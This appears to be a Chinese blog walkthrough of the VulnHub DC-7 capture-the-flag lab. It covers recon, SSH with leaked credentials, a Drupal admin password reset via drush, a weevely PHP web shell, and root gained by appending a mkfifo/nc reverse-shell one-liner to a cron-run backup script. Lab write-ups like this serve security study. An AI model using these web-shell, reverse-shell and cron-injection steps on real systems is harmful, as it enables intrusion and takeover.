综合实战第二章-DC-7


综合实战第二章

DC-7

环境准备

靶场下载:https://www.vulnhub.com/?page=2&q=dc

攻击机:

kali 192.168.3.134

win7 192.168.3.137

靶机:DC-5 192.168.3.169

信息搜集

nmap -p- -A 192.168.3.169

image-20220502163625665

开放了22、80端口,先打开网页看看

image-20220502163735836

搜集一些信息

whatweb http://192.168.3.169

image-20220502163858921

也没啥东西

他说要在外面查找

image-20220502164407282

看到这玩意,百度一下

在github中找到一个DC7USER中找到源文件

image-20220502164604249

在config.php中找到账号密码

image-20220502164624375

尝试登录

用sql没成功,ssh成功了

ssh dc7user@192.168.3.169

image-20220502164931980

登录网站

尝试登录网站

先看看有啥

ls

image-20220502165118342

在backups目录里有俩东西

image-20220502165138303

再看看mbox

image-20220502165241108

发现他是运行了backups.sh

看一下backups.sh文件里写的啥

cd /opt/scripts
cat backups.sh

image-20220502165454783

应该是用来备份数据库的一个东西

我们根据提示再去网站目录看看

cd /var/www/html

通过drush命令修改密码

drush user-password admin --password="123456"

可以登录网站了

安装插件

先点击这个

image-20220502170316618

image-20220502170326098

这里发现上传点,但是不让上传php的文件

image-20220502170350998

所以要安装插件

插件下载:http://drupal.org/project/php

下载好之后不用解压,直接安装

image-20220502170647706

进去之后点击

image-20220502170708236

找好目录上传就好

image-20220502170740687

上传成功

image-20220502170752845

然后激活

在Extend-List中找到PHP Filter

image-20220502171120044

点击install

image-20220502171136956

现在就能上传php了

image-20220502171228605

写入木马

首先构造一个

weevely generate 123456 dcmuma.php      

构造好之后把内容复制进去

image-20220502171447524

然后保存

image-20220502171503191

保存成功后使用weevely

weevely http://192.168.3.169/node/4 123456

image-20220502171600683

连接成功

提权

首先反弹nc

nc -e /bin/bash 192.168.3.134 4444

然后在kali上另开一个窗口

nc -lvvp 4444

美化一下界面

python -c 'import pty;pty.spawn("/bin/bash")'

去搞backups.sh

cd /opt/scripts
ls -la

image-20220502172807289

我们要再backups.sh里面加点东西

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.3.134 1234 > /tmp/f" >> backups.sh

设置监听

nc -lvvp 1234

等待计划任务运行

image-20220502184535490

连接成功

image-20220502184607015

拿到flag!


文章作者: Broken-year
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Broken-year !
  目录